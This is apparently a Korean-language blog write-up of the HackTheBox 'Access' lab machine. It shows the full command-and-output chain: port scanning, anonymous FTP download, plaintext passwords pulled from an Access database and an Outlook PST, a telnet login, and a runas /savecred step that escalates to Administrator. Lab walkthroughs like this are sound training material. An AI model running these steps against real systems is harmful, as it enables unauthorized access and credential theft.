Post

[HTB] Access Write Up

Posted
By zzer0
3 min read
[HTB] Access Write Up

포트 스캔

1

sudo nmap -Pn -p- --min-rate 1000 -T4 -oN scans/initial_Pn 10.129.6.51

1
2
3
4

PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

초기 침투

FTP 익명 접속

  • anonymous / Enter 접속
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(kali㉿kali)-[~/htb/access]
└─$ ftp 10.129.6.51      
Connected to 10.129.6.51.
220 Microsoft FTP Service
Name (10.129.6.51:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
  • 바이너리 모드 켜기
1

binary
  • Backups\backup.mdb 다운로드
1

get backup.mdb
  • Engineer\Access Control.zip 다운로드
1

get Access\ Control.zip

backup.mdb 파일 확인

  • 테이블 목록 확인
1
2
3

┌──(kali㉿kali)-[~/htb/access]
└─$ mdb-tables backup.mdb 
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
  • auth_user 테이블 조회
1
2
3
4
5
6

┌──(kali㉿kali)-[~/htb/access]
└─$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

1

PST 파일 열기

  • Access\ Control.zip 압축 해제 시 비밀번호 필요 (위에서 얻은 access4u@security 패스워드 사용)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

┌──(kali㉿kali)-[~/htb/access]
└─$ 7z x Access\ Control.zip

7-Zip 26.00 (x64) : Copyright (c) 1999-2026 Igor Pavlov : 2026-02-12
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

    
Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870
  • PST 파일 열기 (outlook 데이터 파일)
1
2
3
4
5

┌──(kali㉿kali)-[~/htb/access]
└─$ readpst -M Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.
  • 파일 내용 확인
1
2
3
4
5
6
7
8
9
10
11

Hi there,

 

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

 

Regards,

John

2

Telnet 접속

  • security / 4Cc3ssC0ntr0ller 계정으로 접속
1
2
3
4
5
6
7
8
9
10
11
12
13
14

┌──(kali㉿kali)-[~/htb/access]
└─$ telnet 10.129.6.51 23          
Trying 10.129.6.51...
Connected to 10.129.6.51.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
  • 사용자 플래그 획득
1
2

C:\Users\security\Desktop>type user.txt
...

권한 상승

cmdkey /list

  • 사용자가 저장한 자격 증명 관리자에서 캐시된 인증 정보 검색
1
2
3
4
5
6
7

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

3

  • runas를 이용한 exploit
1

runas /user:ACCESS\Administrator /savecred "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"
  • 관리자 플래그 획득
1
2

C:\Users\security\Desktop>type root.txt
...
htb
This post is licensed under CC BY 4.0 by the author.